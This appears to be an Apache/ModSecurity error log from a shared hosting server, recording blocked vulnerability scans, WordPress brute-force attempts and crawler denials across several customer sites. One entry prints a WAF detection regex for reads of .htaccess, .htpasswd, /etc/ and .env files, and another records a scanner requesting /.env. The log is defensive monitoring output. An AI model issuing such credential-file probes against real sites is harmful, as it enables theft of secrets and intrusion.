[Tue May 26 15:26:35.851747 2026] [security2:error] [pid 707292:tid 707312] [remote 94.76.235.103:55692] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tea.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVuU9KAqlRPSIEFAuuJPgAA8RM"]
[Tue May 26 15:26:36.211959 2026] [security2:error] [pid 707292:tid 707440] [client 74.7.228.10:57084] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.alphaelectronics.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVuVNKAqlRPSIEFAuuJWgAAl2E"]
[Tue May 26 15:26:36.371819 2026] [security2:error] [pid 707292:tid 707459] [client 213.35.106.232:56722] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/functions.php"] [unique_id "ahVuVNKAqlRPSIEFAuuJZQAAAKo"]
[Tue May 26 15:26:36.750090 2026] [security2:error] [pid 707292:tid 707437] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuVNKAqlRPSIEFAuuJYAAAAJQ"]
[Tue May 26 15:26:37.312745 2026] [security2:error] [pid 707292:tid 707491] [client 213.35.106.232:56880] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/class-wp.php"] [unique_id "ahVuVdKAqlRPSIEFAuuJhQAAAMo"]
[Tue May 26 15:26:38.186573 2026] [security2:error] [pid 707292:tid 707474] [client 213.35.106.232:57058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/option.php"] [unique_id "ahVuVtKAqlRPSIEFAuuJoAAAALk"]
[Tue May 26 15:26:39.073344 2026] [security2:error] [pid 707292:tid 707437] [client 213.35.106.232:57216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/post.php"] [unique_id "ahVuV9KAqlRPSIEFAuuJuQAAAJQ"]
[Tue May 26 15:26:39.333963 2026] [security2:error] [pid 707292:tid 707517] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuVtKAqlRPSIEFAuuJtQAAAOQ"]
[Tue May 26 15:26:39.883836 2026] [security2:error] [pid 707292:tid 707427] [client 213.35.106.232:57397] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-includes/user.php"] [unique_id "ahVuV9KAqlRPSIEFAuuJyQAAAIo"]
[Tue May 26 15:26:41.972956 2026] [autoindex:error] [pid 707292:tid 707502] [client 213.35.106.232:57639] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:42.350190 2026] [security2:error] [pid 707292:tid 707504] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuWdKAqlRPSIEFAuuKBAAAANc"]
[Tue May 26 15:26:42.961865 2026] [http2:info] [pid 715645:tid 715645] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:26:43.671683 2026] [security2:error] [pid 715645:tid 715829] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuW3VGgMGh8k213RjqaAAAADY"]
[Tue May 26 15:26:44.314897 2026] [autoindex:error] [pid 715645:tid 715875] [client 213.35.106.232:58014] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:45.168900 2026] [security2:error] [pid 715645:tid 715789] [client 85.208.96.201:36260] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVuXXVGgMGh8k213RjqpQAAAA4"]
[Tue May 26 15:26:45.169033 2026] [security2:error] [pid 715645:tid 715789] [client 85.208.96.201:36260] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/8/"] [unique_id "ahVuXXVGgMGh8k213RjqpQAAAA4"]
[Tue May 26 15:26:45.310410 2026] [security2:error] [pid 715645:tid 715788] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuXHVGgMGh8k213RjqnQAAAA0"]
[Tue May 26 15:26:45.583509 2026] [security2:error] [pid 715645:tid 715813] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuXXVGgMGh8k213RjqqAAAACY"]
[Tue May 26 15:26:45.929563 2026] [security2:error] [pid 715645:tid 715819] [client 213.35.106.232:58014] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 232.106.35.213.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.whitesun.in"] [uri "/wp-content/plugins/hello.php"] [unique_id "ahVuXXVGgMGh8k213RjqugAAACw"]
[Tue May 26 15:26:46.311292 2026] [security2:error] [pid 715645:tid 715752] [remote 51.91.98.45:53390] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "poonawallatennisacademy.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVuXnVGgMGh8k213RjqwQAARWo"]
[Tue May 26 15:26:47.891570 2026] [security2:error] [pid 715645:tid 715807] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuX3VGgMGh8k213Rjq6QAAACA"]
[Tue May 26 15:26:49.015009 2026] [autoindex:error] [pid 715645:tid 715873] [client 213.35.106.232:58711] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:49.258499 2026] [autoindex:error] [pid 715645:tid 715864] [client 213.35.106.232:58711] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:49.527189 2026] [autoindex:error] [pid 715645:tid 715877] [client 213.35.106.232:58711] AH01276: Cannot serve directory /home2/whitece9/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:26:49.641081 2026] [security2:error] [pid 715645:tid 715889] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/SuitabilityAssessment.php"] [unique_id "ahVuYXVGgMGh8k213RjrHwAAAHI"], referer: http://stockmarketanalysis.in/SuitabilityAssessment.php
[Tue May 26 15:26:50.089847 2026] [security2:error] [pid 715645:tid 715791] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/aboutus.php"] [unique_id "ahVuYnVGgMGh8k213RjrLgAAABA"], referer: http://stockmarketanalysis.in/aboutus.php
[Tue May 26 15:26:50.590809 2026] [security2:error] [pid 715645:tid 715657] [remote 109.205.180.55:56666] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahVuYnVGgMGh8k213RjrOwAAMgs"]
[Tue May 26 15:26:50.595670 2026] [security2:error] [pid 715645:tid 715782] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/base-metal-tips.php"] [unique_id "ahVuYnVGgMGh8k213RjrQAAAAAc"], referer: http://stockmarketanalysis.in/base-metal-tips.php
[Tue May 26 15:26:50.634027 2026] [security2:error] [pid 715645:tid 715784] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuYnVGgMGh8k213RjrNAAAAAk"]
[Tue May 26 15:26:51.108831 2026] [security2:error] [pid 715645:tid 715872] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/btst-stbt---future.php"] [unique_id "ahVuY3VGgMGh8k213RjrTwAAAGE"], referer: http://stockmarketanalysis.in/btst-stbt---future.php
[Tue May 26 15:26:51.640165 2026] [security2:error] [pid 715645:tid 715897] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/btst.php"] [unique_id "ahVuY3VGgMGh8k213RjrXAAAAHo"], referer: http://stockmarketanalysis.in/btst.php
[Tue May 26 15:26:52.090301 2026] [security2:error] [pid 715645:tid 715797] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/bullion-power-tips.php"] [unique_id "ahVuZHVGgMGh8k213RjrZwAAABY"], referer: http://stockmarketanalysis.in/bullion-power-tips.php
[Tue May 26 15:26:52.589418 2026] [security2:error] [pid 715645:tid 715835] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/bullion-tips.php"] [unique_id "ahVuZHVGgMGh8k213RjregAAADw"], referer: http://stockmarketanalysis.in/bullion-tips.php
[Tue May 26 15:26:52.908732 2026] [security2:error] [pid 715645:tid 715832] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuZHVGgMGh8k213RjreQAAADk"]
[Tue May 26 15:26:53.073010 2026] [security2:error] [pid 715645:tid 715848] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/career.php"] [unique_id "ahVuZXVGgMGh8k213RjrhgAAAEk"], referer: http://stockmarketanalysis.in/career.php
[Tue May 26 15:26:53.587745 2026] [security2:error] [pid 715645:tid 715891] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/complain.php"] [unique_id "ahVuZXVGgMGh8k213RjrmQAAAHQ"], referer: http://stockmarketanalysis.in/complain.php
[Tue May 26 15:26:53.873553 2026] [security2:error] [pid 715645:tid 715865] [client 176.65.139.232:29776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koiralalogistics.com"] [uri "/.env"] [unique_id "ahVuZXVGgMGh8k213RjroQAAAFo"]
[Tue May 26 15:26:54.043866 2026] [security2:error] [pid 715645:tid 715899] [client 185.220.100.244:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.220.100.244" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1096"] [id "900925"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "stockmarketanalysis.in"] [uri "/contact.php"] [unique_id "ahVuZnVGgMGh8k213RjrogAAAHw"], referer: http://stockmarketanalysis.in/contact.php
[Tue May 26 15:26:54.538860 2026] [security2:error] [pid 715645:tid 715879] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/disclaimer.php"] [unique_id "ahVuZnVGgMGh8k213RjrsAAAAGg"], referer: http://stockmarketanalysis.in/disclaimer.php
[Tue May 26 15:26:55.011742 2026] [security2:error] [pid 715645:tid 715824] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/disclosures.php"] [unique_id "ahVuZ3VGgMGh8k213RjrxAAAADE"], referer: http://stockmarketanalysis.in/disclosures.php
[Tue May 26 15:26:55.543911 2026] [security2:error] [pid 715645:tid 715872] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/energy-pack.php"] [unique_id "ahVuZ3VGgMGh8k213Rjr0AAAAGE"], referer: http://stockmarketanalysis.in/energy-pack.php
[Tue May 26 15:26:55.741037 2026] [security2:error] [pid 715645:tid 715849] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuZ3VGgMGh8k213RjrywAAAEo"]
[Tue May 26 15:26:56.055421 2026] [security2:error] [pid 715645:tid 715853] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/equity-%26-derivatives-combo-pack.php"] [unique_id "ahVuaHVGgMGh8k213Rjr2wAAAE4"], referer: http://stockmarketanalysis.in/equity-%26-derivatives-combo-pack.php
[Tue May 26 15:26:56.728921 2026] [security2:error] [pid 715645:tid 715838] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/faq.php"] [unique_id "ahVuaHVGgMGh8k213Rjr6QAAAD8"], referer: http://stockmarketanalysis.in/faq.php
[Tue May 26 15:26:57.295857 2026] [security2:error] [pid 715645:tid 715800] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/freetrial.php"] [unique_id "ahVuaXVGgMGh8k213RjsAAAAABk"], referer: http://stockmarketanalysis.in/freetrial.php
[Tue May 26 15:26:57.763723 2026] [security2:error] [pid 715645:tid 715784] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuaXVGgMGh8k213RjsAwAAAAk"]
[Tue May 26 15:26:57.915273 2026] [security2:error] [pid 715645:tid 715868] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/hni-cash.php"] [unique_id "ahVuaXVGgMGh8k213RjsFgAAAF0"], referer: http://stockmarketanalysis.in/hni-cash.php
[Tue May 26 15:26:58.039472 2026] [security2:error] [pid 715645:tid 715894] [client 76.38.47.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuaXVGgMGh8k213RjsCwAAAHc"]
[Tue May 26 15:26:58.296579 2026] [security2:error] [pid 715645:tid 715674] [remote 141.95.202.18:46672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVuanVGgMGh8k213RjsGgAABhw"]
[Tue May 26 15:26:59.983223 2026] [security2:error] [pid 715645:tid 715866] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVua3VGgMGh8k213RjsRgAAAFs"]
[Tue May 26 15:27:00.322100 2026] [security2:error] [pid 715645:tid 715884] [client 185.220.100.244:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.100.220.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/index-option-power.php"] [unique_id "ahVubHVGgMGh8k213RjsXwAAAG0"], referer: http://stockmarketanalysis.in/index-option-power.php
[Tue May 26 15:27:01.003552 2026] [security2:error] [pid 715645:tid 715788] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/index-option-tips.php"] [unique_id "ahVubHVGgMGh8k213RjsdAAAAA0"], referer: http://stockmarketanalysis.in/index-option-tips.php
[Tue May 26 15:27:01.600830 2026] [security2:error] [pid 715645:tid 715799] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/index.php"] [unique_id "ahVubXVGgMGh8k213RjshQAAABg"], referer: http://stockmarketanalysis.in/index.php
[Tue May 26 15:27:02.150620 2026] [security2:error] [pid 715645:tid 715902] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/kyc.php"] [unique_id "ahVubnVGgMGh8k213RjskwAAAH8"], referer: http://stockmarketanalysis.in/kyc.php
[Tue May 26 15:27:02.438725 2026] [security2:error] [pid 715645:tid 715854] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVubnVGgMGh8k213RjskQAAAE8"]
[Tue May 26 15:27:02.794930 2026] [security2:error] [pid 715645:tid 715815] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/nifty-%26-bank-nifty-power.php"] [unique_id "ahVubnVGgMGh8k213RjsqQAAACg"], referer: http://stockmarketanalysis.in/nifty-%26-bank-nifty-power.php
[Tue May 26 15:27:03.397578 2026] [security2:error] [pid 715645:tid 715790] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/nifty-tips.php"] [unique_id "ahVub3VGgMGh8k213RjsvQAAAA8"], referer: http://stockmarketanalysis.in/nifty-tips.php
[Tue May 26 15:27:03.946491 2026] [security2:error] [pid 715645:tid 715902] [client 192.42.116.101:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 101.116.42.192.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "stockmarketanalysis.in"] [uri "/option-hni.php"] [unique_id "ahVub3VGgMGh8k213RjsywAAAH8"], referer: http://stockmarketanalysis.in/option-hni.php
[Tue May 26 15:27:04.244154 2026] [security2:error] [pid 715645:tid 715843] [client 104.194.132.199:60952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.132.194.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVucHVGgMGh8k213RjszAAAAEQ"], referer: https://www.cagmedya.com/isletmeler-icin-web-sitesi-guvenligi/
